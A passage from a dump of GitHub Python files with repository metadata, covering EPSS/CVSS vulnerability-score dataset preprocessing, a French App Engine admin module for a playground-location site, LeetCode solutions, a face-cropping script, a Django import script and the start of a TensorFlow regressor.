data\n\ndef cvss_thresholding(data,col_name = 'cvss'):\n \n one = len(data[data[col_name] < 0.1])/len(data)\n two = len(data[data[col_name] < 4.0])/len(data) - one\n three = len(data[data[col_name] < 7.0])/len(data) - two - one\n four = len(data[data[col_name] < 9.0])/len(data) - three - two - one\n five = len(data[data[col_name] >= 9.0])/len(data)\n \n print('one ',one, ' two ',two,' three ',three,' four ',four,' five ',five)\n\n \n for id in data.index:\n if data[col_name][id] < 0.1:\n data[col_name][id] = 1\n elif data[col_name][id] < 4.0:\n data[col_name][id] = 2\n elif data[col_name][id] < 7.0:\n data[col_name][id] = 3\n elif data[col_name][id] < 9.0:\n data[col_name][id] = 4\n else:\n data[col_name][id] = 5\n return data\n\ndef filter_data(data):\n data = data[data.attackVector != -1]\n data = data[data.attackComplexity != -1]\n data = data[data.privilegesRequired != -1]\n data = data[data.userInteraction != -1]\n data = data[data.scope != -1]\n data = data[data.confidentialityImpact != -1]\n data = data[data.integrityImpact != -1]\n data = data[data.availabilityImpact != -1]\n return data\n\ndef preprocess(a=0.00949,b=0.019,cvss = False):\n \n data = pd.read_csv('./data/data2/epss_dataset.csv',index_col = 0)\n \n if cvss:\n del data['epss'] # comment to include epss\n else:\n del data['cvss'] # comment to include cvss\n data = data[data.epss!=0]\n \n # data['cvss'] = data['cvss'].round()\n # data['epss'].astype(float)\n # data['epss'] = data['epss'].round(decimals=2)\n \n \n data.dropna(inplace=True) # cvss contains null value\n data = filter_data(data)\n if cvss:\n data = cvss_thresholding(data)\n data.to_csv('./data/data2/cvss_dataset_final_epss.csv')\n else:\n data2 = epss_thesholding(data,a,b)\n data2.to_csv('./data/data2/epss_dataset_final_epss.csv')\n # data.to_csv('./data/data2/cvss_epss.csv')\n \n\n\ndef valid_index(lst):\n gotZero = False\n first = 0\n for i in range (0,len(lst)):\n if lst[i]==-1:\n if gotZero:\n return first,i\n elif not gotZero:\n gotZero = True\n first = i\n return first, len(lst)\n\n\ndef collectepsstraindata():\n mdata = read_csv_dataset('./data/2016_22_nvd.csv')\n # mdata.to_csv('./data/2016_22m_nvd.csv')\n # generate_top_vendor_prod()\n \n top_vend = pd.read_csv('./data/top_vendors.csv',index_col=0)\n top_prod = pd.read_csv('./data/top_products.csv',index_col=0)\n \n \n data = generate(mdata,top_vend,top_prod)\n arr = ['attackVector','attackComplexity','privilegesRequired','userInteraction','scope',\n 'confidentialityImpact','integrityImpact','availabilityImpact']\n \n for i in arr:\n codes, uniques = pd.factorize(mdata[i])\n data[i] = codes\n \n mdata.index = mdata[\"ID\"]\n mdata.drop('ID', inplace=True, axis=1)\n \n topics_data = pd.read_csv(\"./data/epss_topics_16_22.csv\")\n data = add_columns_to_df(data,topics_data)\n \n dat = mdata['baseScore']\n data['cvss'] = dat #list(dat.round())\n \n \n \n dat = data['epss'].astype(float)\n data.drop('epss', inplace=True, axis=1)\n data['epss'] = dat #list(dat.round(decimals=2))\n data.to_csv('./data/epss_dataset.csv.csv')\n \n return data\n \n#%% main\nif __name__ == \"__main__\":\n # for EPSS model generation data\n \n affected_years = download_data()\n data = merge_all('./downloaded',2016,2050) # affected year should be used and merging with original database inorder to reduce time\n data.to_csv('./data/2016_22_nvd.csv',index=False)\n mdata = read_csv_dataset('./data/2016_22_nvd.csv')\n mdata.to_csv('./data/2016_22m_nvd.csv')\n \n data = collectepsstraindata()\n # end\n \n \n \n# saving data\n\n import pickle\n with open('all_data.pickle', 'wb') as f:\n pickle.dump(data, f)\n \n data.to_csv('./data/epss_16_22_without_topic.csv')\n data2.to_csv('latest2.csv',index = False)\n \n \n data.to_csv(\"16_22_desc_filtered_data.csv\",index=False)\n \n vendor_product_perser = P_ven_prod(data['cpe23Uri'])\n \n vendor_product_perser.gen_vendor_info()\n \n vendor_inf = vendor_product_perser.vendor_info\n \n \n df = pd.DataFrame.from_dict(vendor_inf, orient='index') \n df.to_csv('vendor.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"arman18/Vulnerability_scoring_system","sub_path":"epss_dataset_generator.py","file_name":"epss_dataset_generator.py","file_ext":"py","file_size_in_byte":14815,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"41844833659","text":"# -*- coding: utf-8 -*-\r\nimport webapp2\r\nimport datetime\r\nimport json\r\nimport cloudstorage as gcs\r\n\r\nfrom google.appengine.ext import blobstore\r\nfrom google.appengine.ext.webapp import blobstore_handlers\r\nfrom google.appengine.api import taskqueue\r\nfrom dbClass import *\r\nfrom google.appengine.datastore.datastore_query import Cursor\r\n\r\n\r\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'template')\r\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=True)\r\n\r\n\r\nclass Handler(webapp2.RequestHandler):\r\n # Handler modifier pour intégrer la prise ne charge de jinja\r\n def write(self, *a, **kw):\r\n self.response.out.write(*a, **kw)\r\n\r\n @staticmethod\r\n def render_str(template, **params):\r\n t = jinja_env.get_template(template)\r\n return t.render(params).encode(encoding=\"utf-8\")\r\n\r\n def render(self, template, **kw):\r\n self.write(self.render_str(template, **kw).decode(encoding=\"utf-8\"))\r\n\r\n\r\nclass MainHandler(webapp2.RequestHandler):\r\n def get(self):\r\n upload_url = blobstore.create_upload_url('/admin/upload')\r\n html_string = \"\"\"\r\n
    \r\n \r\n \r\n \r\n \"\"\" % upload_url\r\n\r\n self.response.write(html_string)\r\n\r\n\r\nclass UploadHandler(blobstore_handlers.BlobstoreUploadHandler):\r\n def post(self):\r\n upload_files = self.get_uploads('file') # 'file' is file upload field in the form\r\n type = self.request.get(\"type_csv\")\r\n blob_info = upload_files[0]\r\n if type == \"ville\":\r\n taskqueue.add(url='/admin/process_csv', params={'blob_key': blob_info.key(), 'cursor': 0})\r\n elif type == \"departement\":\r\n taskqueue.add(url='/admin/departement_csv', params={'blob_key': blob_info.key()})\r\n # blobstore.delete(blob_info.key()) # optional: delete file after import\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass NetoyerDoublonHandler(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/process_doublon')\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass ProcessCsv(webapp2.RequestHandler):\r\n def post(self):\r\n max_data_access = 1000\r\n blob_info = self.request.get('blob_key')\r\n cursor = int(self.request.get('cursor'))\r\n blob_reader = blobstore.BlobReader(blob_info)\r\n i = 0\r\n for row in blob_reader:\r\n if i >= cursor and i < cursor + max_data_access:\r\n pays, CP, ville, info1, info2, departement, \\\r\n numDepartement, arrond, numArrond, latitude, longitude, precision = row.split('\\t')\r\n if len(CP) <= 5:\r\n entry = Commune(nom=ville, CP=CP, departement=numDepartement, pays=pays,\r\n coordonnees=ndb.GeoPt(latitude + \", \" + longitude))\r\n queryVille = Commune.query(ndb.AND(Commune.nom == entry.nom, Commune.CP == entry.CP))\r\n if queryVille.count() == 0:\r\n entry.put()\r\n elif i >= cursor + max_data_access:\r\n next_cursor = cursor + max_data_access\r\n taskqueue.add(url='/admin/process_csv', params={'blob_key': blob_info,\r\n 'cursor': next_cursor},\r\n countdown=21600)\r\n break\r\n i += 1\r\n\r\n\r\nclass DepartementCsv(webapp2.RequestHandler):\r\n def post(self):\r\n blob_info = self.request.get('blob_key')\r\n blob_reader = blobstore.BlobReader(blob_info)\r\n for row in blob_reader:\r\n old_num, num, nom, info1, info2, info3 = row.split(\",\")\r\n query_departement = Departement.query(Departement.numero == num[1:-1]).get()\r\n if query_departement:\r\n query_departement.lettre = nom[1:-1]\r\n query_departement.put()\r\n else:\r\n nouveau_departement = Departement(numero=num[1:-1], lettre=nom[1:-1])\r\n nouveau_departement.put()\r\n\r\n\r\nclass SuprimeDoubleVille(webapp2.RequestHandler):\r\n def post(self):\r\n max_data_access = 10000\r\n curs = Cursor(urlsafe=self.request.get('cursor'))\r\n if curs:\r\n query_ville, next_cursor, more = Commune.query().fetch_page(max_data_access, start_cursor=curs)\r\n else:\r\n query_ville, next_cursor, more = Commune.query().fetch_page(max_data_access)\r\n\r\n for ville in query_ville:\r\n query_same = Commune.query(ndb.AND(ndb.AND(Commune.nom == ville.nom, Commune.departement == ville.departement),\r\n Commune.CP != ville.CP))\r\n for doublon in query_same:\r\n doublon.key.delete()\r\n\r\n if more:\r\n taskqueue.add(url='/admin/process_doublon', params={'cursor': next_cursor.urlsafe()},\r\n countdown=86400)\r\n\r\n\r\nclass LowerCase(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/lowerCaseVille')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 7000\r\n curs = Cursor(urlsafe=self.request.get('cursor'))\r\n if curs:\r\n queryVille, next_cursor, more = Commune.query().fetch_page(max_data_access, start_cursor=curs)\r\n else:\r\n queryVille, next_cursor, more = Commune.query().fetch_page(max_data_access)\r\n for ville in queryVille:\r\n ville.put()\r\n\r\n if more:\r\n taskqueue.add(url='/admin/lowerCaseVille', params={'cursor': next_cursor.urlsafe()},\r\n countdown=86400)\r\n\r\n\r\nclass RecompteHandler(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/rest_compte_dep_ville')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 1000\r\n curs = Cursor(urlsafe=self.request.get('cursor'))\r\n query_ville = AireDeJeux.query(projection=[AireDeJeux.ville], distinct=True)\r\n if curs:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access, start_cursor=curs)\r\n else:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access)\r\n for key_ville in liste_ville:\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville == key_ville.ville)\r\n ville = key_ville.ville.get()\r\n ville.nbr_aire_de_jeux = query_aire_de_jeux.count()\r\n logging.info(ville.nom + \": \" + str(ville.nbr_aire_de_jeux))\r\n ville.put()\r\n if more:\r\n taskqueue.add(url='/admin/rest_compte_dep_ville', params={'cursor': next_cursor.urlsafe()},\r\n countdown=86400)\r\n else:\r\n query_departement = Commune.query(projection=[Commune.departement], distinct=True)\r\n for dep in query_departement:\r\n query_ville = Commune.query(Commune.departement == dep.departement).fetch(projection=[Commune.nbr_aire_de_jeux])\r\n count = 0\r\n for ville in query_ville:\r\n count += ville.nbr_aire_de_jeux\r\n departement = Departement.query(Departement.numero == dep.departement).get()\r\n if departement:\r\n departement.nbr_aire_de_jeux = count\r\n departement.put()\r\n else:\r\n new_departement = Departement(numero=dep.departement, nbr_aire_de_jeux=count)\r\n new_departement.put()\r\n\r\n\r\nclass SitemapBlobHandler(webapp2.RequestHandler):\r\n def get(self):\r\n sitemap = gcs.open(\"/oujouerdehors/sitemap.xml\", mode=\"w\", content_type=\"text/xml\")\r\n sitemap.write(\"\"\"\r\n \r\n \"\"\")\r\n sitemap.write(\"\"\"http://www.oujouerdehors.org/\r\n monthly\r\n 1\"\"\")\r\n sitemap.write(\"\"\"http://www.oujouerdehors.org/aireDeJeux\r\n monthly\r\n 0.9\"\"\")\r\n template = \"\"\"http://www.oujouerdehors.org/%DATA%\r\n monthly\r\n %SCORE%\"\"\"\r\n query_aire_de_jeux = AireDeJeux.query()\r\n for aire_de_jeux in query_aire_de_jeux:\r\n new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + aire_de_jeux.url)\r\n new_url = new_url.replace(\"%SCORE%\", \"0.5\")\r\n sitemap.write(new_url.encode(\"utf-8\"))\r\n query_departement = Departement.query(Departement.nbr_aire_de_jeux > 0)\r\n for departement in query_departement:\r\n logging.info(departement.numero)\r\n new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + departement.numero)\r\n new_url = new_url.replace(\"%SCORE%\", \"0.85\")\r\n sitemap.write(new_url.encode(\"utf-8\"))\r\n query_commune = Commune.query(Commune.nbr_aire_de_jeux > 0)\r\n for commune in query_commune:\r\n new_url = template.replace(\"%DATA%\", \"aireDeJeux/\" + commune.departement + \"/\" + commune.nom)\r\n new_url = new_url.replace(\"%SCORE%\", \"0.75\")\r\n sitemap.write(new_url.encode(\"utf-8\"))\r\n sitemap.write(\"\")\r\n sitemap.close()\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass AjoutDateHandler(webapp2.RequestHandler):\r\n def get(self):\r\n curent_date = datetime.datetime.now()\r\n query_aire_de_jeux = AireDeJeux.query()\r\n for aire_de_jeux in query_aire_de_jeux:\r\n change = False\r\n if not aire_de_jeux.date_creation:\r\n aire_de_jeux.date_creation = curent_date\r\n change = True\r\n if not aire_de_jeux.valider:\r\n aire_de_jeux.valider = True\r\n change = True\r\n if change:\r\n aire_de_jeux.put()\r\n query_detail = Detail.query()\r\n for detail in query_detail:\r\n change = False\r\n if not detail.date_creation:\r\n detail.date_creation = curent_date\r\n change = True\r\n if not detail.valider:\r\n detail.valider = True\r\n change = True\r\n if change:\r\n detail.put()\r\n query_commentaire = Commentaire.query()\r\n for commentaire in query_commentaire:\r\n change = False\r\n if not commentaire.date_creation:\r\n commentaire.date_creation = curent_date\r\n change = True\r\n if not commentaire.valider:\r\n commentaire.valider = True\r\n change = True\r\n if change:\r\n commentaire.put()\r\n query_photos = Photo.query()\r\n for photo in query_photos:\r\n change = False\r\n if not photo.date_creation:\r\n photo.date_creation = curent_date\r\n change = True\r\n if not photo.valider:\r\n photo.valider = True\r\n change = True\r\n if change:\r\n photo.put()\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass AValiderHandler(Handler):\r\n def render_main(self, liste_aire_de_jeux, liste_details, liste_comments, liste_photos):\r\n self.render(\"a_valider.html\",\r\n liste_aire_de_jeux=liste_aire_de_jeux,\r\n liste_details=liste_details,\r\n liste_comments=liste_comments,\r\n liste_photos=liste_photos)\r\n\r\n def get(self):\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.valider==False).fetch(100)\r\n query_details = Detail.query(Detail.valider==False).fetch(100)\r\n query_comments = Commentaire.query(Commentaire.valider==False).fetch(100)\r\n query_photos = Photo.query(Photo.valider==False).fetch(100)\r\n valider(False)\r\n self.render_main(query_aire_de_jeux, query_details, query_comments, query_photos)\r\n\r\n def post(self):\r\n urlsafe_key = self.request.get('key')\r\n logging.info(\"key=\" + urlsafe_key)\r\n key = ndb.Key(urlsafe=urlsafe_key)\r\n enregistrement = key.get()\r\n enregistrement.valider = True\r\n enregistrement.put()\r\n\r\n\r\nclass AjouterFichierHandler(Handler):\r\n def render_main(self):\r\n upload_url = blobstore.create_upload_url('/admin/upload_aire_de_jeux')\r\n self.render(\"ajout_fichier_aire_de_jeux.html\", upload_url=upload_url)\r\n\r\n def get(self):\r\n self.render_main()\r\n\r\n\r\nclass AjouterFichierBlobHandler(blobstore_handlers.BlobstoreUploadHandler):\r\n def post(self):\r\n key_ville = ndb.Key(urlsafe=self.request.get('key_ville'))\r\n ville = key_ville.get()\r\n departement = Departement.query(Departement.numero == ville.departement).get()\r\n upload_files = self.get_uploads('file')\r\n blob_info = upload_files[0]\r\n blob_key = blob_info.key()\r\n blob_reader = blobstore.BlobReader(blob_key)\r\n jason_value = unicode(blob_reader.read(), 'latin-1')\r\n data = json.loads(jason_value)\r\n liste_nom = {}\r\n list_coordonnees = []\r\n for aire_de_jeux in data:\r\n nom = aire_de_jeux[5][0][1][0]\r\n if nom[:4] == 'Aire':\r\n nom = nom[15:]\r\n coordonnees = ndb.GeoPt(float(aire_de_jeux[1][0][0][0]),\r\n float(aire_de_jeux[1][0][0][1]))\r\n if coordonnees not in list_coordonnees:\r\n list_coordonnees.append(coordonnees)\r\n if nom in liste_nom.iterkeys():\r\n liste_nom[nom] += 1\r\n else:\r\n liste_nom[nom] = 0\r\n # test_unique = AireDeJeux.query(ndb.AND(AireDeJeux.nom == nom, AireDeJeux.ville == key_ville))\r\n count = \"\"\r\n if liste_nom[nom] > 0:\r\n count = \" \" + str(liste_nom[nom])\r\n existe = True\r\n while existe:\r\n indice = random_str()\r\n already_existe = AireDeJeux.query(AireDeJeux.indice == indice)\r\n if already_existe.count() == 0:\r\n existe = False\r\n new_detail = Detail(indice=indice,\r\n valider=True,\r\n coordonnees=coordonnees)\r\n detail_key = new_detail.put()\r\n new_aire_de_jeux = AireDeJeux(nom=nom + count,\r\n ville=key_ville,\r\n indice=indice,\r\n detail=detail_key,\r\n valider=True,\r\n url=ville.departement + \"/\" + ville.nom + \"/\" + nom)\r\n new_aire_de_jeux.put()\r\n ville.nbr_aire_de_jeux += 1\r\n departement.nbr_aire_de_jeux += 1\r\n departement.put()\r\n ville.put()\r\n self.redirect(\"/admin/\")\r\n\r\n\r\nclass AjouterBordureVille(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/ajout_limite_ville')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 5000\r\n curs = Cursor(urlsafe=self.request.get('cursor'))\r\n query_ville = Commune.query()\r\n if curs:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access, start_cursor=curs)\r\n else:\r\n liste_ville, next_cursor, more = query_ville.fetch_page(max_data_access)\r\n for ville in liste_ville:\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville == ville.key)\r\n marge = 0.0015\r\n ville.NWcoordonnees = ndb.GeoPt(ville.coordonnees.lat + marge, ville.coordonnees.lon - marge)\r\n ville.SEcoordonnees = ndb.GeoPt(ville.coordonnees.lat - marge, ville.coordonnees.lon + marge)\r\n for aire_de_jeux in query_aire_de_jeux:\r\n detail = aire_de_jeux.detail.get()\r\n if detail.coordonnees:\r\n if detail.coordonnees.lat > ville.NWcoordonnees.lat:\r\n ville.NWcoordonnees.lat = detail.coordonnees.lat + marge/5\r\n elif detail.coordonnees.lat < ville.SEcoordonnees.lat:\r\n ville.SEcoordonnees.lat = detail.coordonnees.lat - marge/5\r\n if detail.coordonnees.lon > ville.SEcoordonnees.lon:\r\n ville.SEcoordonnees.lon = detail.coordonnees.lon + marge/5\r\n elif detail.coordonnees.lon < ville.NWcoordonnees.lon:\r\n ville.NWcoordonnees.lon = detail.coordonnees.lon - marge/5\r\n ville.put()\r\n if more:\r\n taskqueue.add(url='/admin/ajout_limite_ville', params={'cursor': next_cursor.urlsafe()}, countdown=86400)\r\n\r\n\r\nclass AjouterBordureDepartement(webapp2.RequestHandler):\r\n def get(self):\r\n taskqueue.add(url='/admin/ajout_limite_departement')\r\n self.redirect(\"/admin/\")\r\n\r\n def post(self):\r\n max_data_access = 5000\r\n query_departement = Departement.query()\r\n liste_departement, next_cursor, more = query_departement.fetch_page(max_data_access)\r\n for departement in liste_departement:\r\n query_commune = Commune.query(Commune.departement == departement.numero)\r\n marge = 0.002\r\n test = False\r\n for commune in query_commune:\r\n if not test:\r\n departement.NWcoordonnees = ndb.GeoPt(commune.coordonnees.lat,\r\n commune.coordonnees.lon)\r\n departement.SEcoordonnees = ndb.GeoPt(commune.coordonnees.lat,\r\n commune.coordonnees.lon)\r\n test = True\r\n elif commune.coordonnees:\r\n if commune.coordonnees.lat > departement.NWcoordonnees.lat:\r\n departement.NWcoordonnees.lat = commune.coordonnees.lat + marge/5\r\n elif commune.coordonnees.lat < departement.SEcoordonnees.lat:\r\n departement.SEcoordonnees.lat = commune.coordonnees.lat - marge/5\r\n if commune.coordonnees.lon > departement.SEcoordonnees.lon:\r\n departement.SEcoordonnees.lon = commune.coordonnees.lon + marge/5\r\n elif commune.coordonnees.lon < departement.NWcoordonnees.lon:\r\n departement.NWcoordonnees.lon = commune.coordonnees.lon - marge/5\r\n departement.put()\r\n\r\nclass cleanUrlHandler(webapp2.RequestHandler):\r\n def get(self):\r\n curent_date = datetime.datetime.now()\r\n query_aire_de_jeux = AireDeJeux.query()\r\n for aire_de_jeux in query_aire_de_jeux:\r\n change = False\r\n if not aire_de_jeux.urldirty:\r\n aire_de_jeux.urldirty = aire_de_jeux.url\r\n aire_de_jeux.url = urlParse(aire_de_jeux.url)\r\n change = True \r\n if change:\r\n aire_de_jeux.put()\r\n\r\nclass addmissingnumberurl(webapp2.RequestHandler):\r\n def get(self):\r\n query_aire_de_jeux = AireDeJeux.query(AireDeJeux.ville==ndb.Key(\"Commune\",4534100874493952));\r\n for aire_de_jeux in query_aire_de_jeux:\r\n array_url = aire_de_jeux.url.split(\"/\")\r\n if array_url[-1] != urlParse(aire_de_jeux.nom):\r\n array_url[-1] = urlParse(aire_de_jeux.nom)\r\n aire_de_jeux.url = \"/\".join(array_url)\r\n aire_de_jeux.put()\r\n self.redirect(\"/admin/\")\r\n\r\nclass ajouterCarvinHandler(webapp2.RequestHandler):\r\n def get(self):\r\n ville_carvin = Commune(nom=\"Courrière\", departement=\"62\", CP=\"62220\", coordonnees = ndb.GeoPt(50.4924, 2.9582), SEcoordonnees = ndb.GeoPt(50.4924, 2.9582), NWcoordonnees = ndb.GeoPt(50.4924, 2.9582))\r\n #ville_carvin.put()\r\n new_departement = Departement(lettre=\"Pas de Calais\", numero=\"62\", nbr_aire_de_jeux=0, SEcoordonnees = ndb.GeoPt(50.4924, 2.9582), NWcoordonnees = ndb.GeoPt(50.4924, 2.9582) )\r\n new_departement.put()\r\n self.redirect(\"/admin/\")\r\n\r\napp = webapp2.WSGIApplication([\r\n ('/admin/', MainHandler),\r\n ('/admin/upload', UploadHandler),\r\n ('/admin/upload_aire_de_jeux', AjouterFichierBlobHandler),\r\n ('/admin/process_csv', ProcessCsv),\r\n ('/admin/departement_csv', DepartementCsv),\r\n ('/admin/process_doublon', SuprimeDoubleVille),\r\n ('/admin/netoyerDoublon', NetoyerDoublonHandler),\r\n ('/admin/lowerCaseVille', LowerCase),\r\n ('/admin/rest_compte_dep_ville', RecompteHandler),\r\n ('/admin/creat_sitemap_blob', SitemapBlobHandler),\r\n ('/admin/ajout_date_creation', AjoutDateHandler),\r\n ('/admin/a_valider', AValiderHandler),\r\n ('/admin/ajout_fichier', AjouterFichierHandler),\r\n ('/admin/ajout_limite_ville', AjouterBordureVille),\r\n ('/admin/ajout_limite_departement', AjouterBordureDepartement),\r\n ('/admin/addmissingnumberurl', addmissingnumberurl),\r\n ('/admin/cleanUrl', cleanUrlHandler),\r\n ('/admin/ajouterCarvin', ajouterCarvinHandler)\r\n], debug=True)\r\n","repo_name":"stephane-duteriez/airedejeux","sub_path":"uploadVille.py","file_name":"uploadVille.py","file_ext":"py","file_size_in_byte":23572,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17086681731","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/6/14 18:08\n# @Author : bocheng.wu\n\n\nclass Solution:\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = list()\n match = {'{': '}', '[': ']', '(': ')'}\n for i in s:\n if i == '{' or i == '(' or i == '[':\n stack.append(i)\n else:\n if len(stack) == 0:\n return False\n\n top = stack.pop()\n\n if match[top] != i:\n return False\n\n if len(stack) != 0:\n return False\n return True\n","repo_name":"yychuyu/LeetCode","sub_path":"problems/0020_Valid_Parentheses/sankforever.py","file_name":"sankforever.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"34"} +{"seq_id":"7914865799","text":"#!/usr/bin/env python\n# coding=utf-8\n# @Time : 2018/4/4 19:33\n# @Author : litianshuang\n# @Email : litianshuang@jingdata.com\n# @File : 64.py\n# @Desc :\n\nclass Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n m = len(grid)\n if m <= 0:\n return 0\n n = len(grid[0])\n\n dp = []\n for i in range(0, m):\n dp.append([])\n for j in range(0, n):\n dp[i].append(grid[i][j])\n if i > 0 and j > 0 :\n dp[i][j] += min(dp[i-1][j], dp[i][j-1])\n elif i > 0:\n dp[i][j] += dp[i-1][j]\n elif j > 0:\n dp[i][j] += dp[i][j-1]\n return dp[m-1][n-1]\n\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.minPathSum([\n [1,3,1],\n [1,5,1],\n [4,2,1]\n ]))","repo_name":"tcltsh/leetcode","sub_path":"leetcode/src/64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70773903137","text":"import cv2 as cv\nimport dlib\nimport numpy\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\nPREDICTOR_PATH = \"shape_predictor_68_face_landmarks.dat\"\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(PREDICTOR_PATH)\ndef get_landmarks(im):\n rects = detector(im, 1)\n\n if len(rects) > 1:\n raise TooManyFaces\n if len(rects) == 0:\n raise NoFaces\n\n # the feature extractor (predictor) requires a rough bounding box as input\n # to the algorithm. This is provided by a traditional face detector (\n # detector) which returns a list of rectangles, each of which corresponding\n # a face in the image\n return numpy.array([[p.x, p.y] for p in predictor(im, rects[0]).parts()])\n\nfor i in range(1,41):\n image_file='data/'+str(i)+'.jpg'\n image = cv.imread(image_file)\n temp=get_landmarks(image)\n preds=temp\n image = cv.imread(image_file)\n try:\n image_height, image_width, image_depth = image.shape\n except:\n print('cannot load image:', image_file)\n minX=1000\n maxX=0\n minY=1000\n maxY=0\n for var in preds:\n if minX > var[0]:\n minX = var[0]\n if maxX < var[0]:\n maxX = var[0]\n if minY > var[1]:\n minY = var[1]\n if maxY < var[1]:\n maxY = var[1]\n \n ### crop face image\n scale=90/math.sqrt((minX-maxX)*(minY-maxY))\n width=maxX-minX\n height=maxY-minY\n cenX=width/2\n cenY=height/2\n\n x= int( (minX+cenX)*scale )\n y= int( (minY+cenY)*scale )\n#print x,y,scale\n\n resized_image = cv.resize(image, (0,0), fx=scale, fy=scale, interpolation=cv.INTER_CUBIC)\n rh,rw,rc = resized_image.shape\n\n #\n crop_width = 160\n crop_height = 244\n left = 0\n top = 0\n right = 0\n bottom = 0\n cx = x\n cy = y\n \n if x < crop_width/2:\n left = int(crop_width/2 - x)\n cx = x + left\n if y < crop_height/2:\n top = crop_height/2 - y\n cy = y + top\n if rw - x < crop_width/2:\n right = crop_width/2 + x - rw;\n if rh - y < crop_height/2:\n bottom = crop_height/2 + y - rh\n #\n \n crop_image = cv.copyMakeBorder(resized_image,top, int(bottom), int(left), int(right),cv.BORDER_REFLECT)\n\n crop_image = crop_image[cy-int(crop_height//2):cy+int(crop_height/2), cx-int(crop_width/2):cx+int(crop_width/2), :]\n cv.imwrite(str(i)+'.jpg',crop_image)\n","repo_name":"xqlin98/Data-Visualization--3d-deformation-transfer","sub_path":"python_transfer/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5622619962","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 13 14:11:11 2017\n\n@author: Andrei\n\"\"\"\n\nimport django, os\nos.environ['DJANGO_SETTINGS_MODULE'] = \"JungeAkademie.settings\"\ndjango.setup()\nfrom modulo.models import Exam\nfrom openpyxl import load_workbook\n\nexamsFile = \"../database.xlsx\"\n\ndef insertExams(databaseFile):\n workbook = load_workbook(databaseFile)\n worksheet = workbook['exams']\n nrRows = len(tuple(worksheet.rows))\n nrCols = len(tuple(worksheet.columns))\n \n add = 0\n for row in worksheet.iter_rows(min_row=2, min_col=1, max_row=nrRows, max_col=nrCols):\n cell = row[0]\n if cell.value is None:\n continue\n i, added = Exam.objects.get_or_create(exam_type=cell.value.strip())\n add += 1 if added else 0\n\n print(\"Number of added exams =\", add)\n print('Number of exams in database =', len(Exam.objects.all()))\n #workbook.close()\n\nif __name__ == \"__main__\":\n insertExams(examsFile)\n input(\"Press ENTER to exit program...\")","repo_name":"dinaaladawy/Modulo","sub_path":"App/JungeAkademie/databaseHelpers/insertExams.py","file_name":"insertExams.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38735053787","text":"from collections import defaultdict \n\nclass Solution:\n def nextGreaterElement(self, nums1: [int], nums2: [int]) -> [int]:\n stack = []\n res = defaultdict(lambda : -1)\n for num in nums2:\n while stack and stack[-1] < num:\n res[stack[-1]] = num\n stack.pop()\n\n stack.append(num)\n\n return [res[num] for num in nums1]","repo_name":"Akua-Serwaa-Nkrumah/CompetitiveProgramming","sub_path":"Camp/BonusProblems/NextGreat.py","file_name":"NextGreat.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36481439030","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport Q_learning_RBF\r\n\r\n\r\nclass SGDRegressor:\r\n def __init__(self, D):\r\n print(\"Hello TensorFlow!\")\r\n lr = 0.1\r\n\r\n # create inputs, targets, params\r\n # matmul doesn't like when w is 1-D\r\n # so we make it 2-D and then flatten the prediction\r\n self.w = tf.Variable(tf.random_normal(shape=(D, 1)), name='w')\r\n self.X = tf.placeholder(tf.float32, shape=(None, D), name='X')\r\n self.Y = tf.placeholder(tf.float32, shape=(None,), name='Y')\r\n\r\n # make prediction and cost\r\n #MATMUL is MULTIPLICATION IN MATRIX and we reshape it to flatten way by [-1]\r\n Y_hat = tf.reshape( tf.matmul(self.X, self.w), [-1] )\r\n delta = self.Y - Y_hat\r\n \r\n #reducing cost\r\n cost = tf.reduce_sum(delta * delta)\r\n\r\n # ops we want to call later, typical gradient descent\r\n self.train_op = 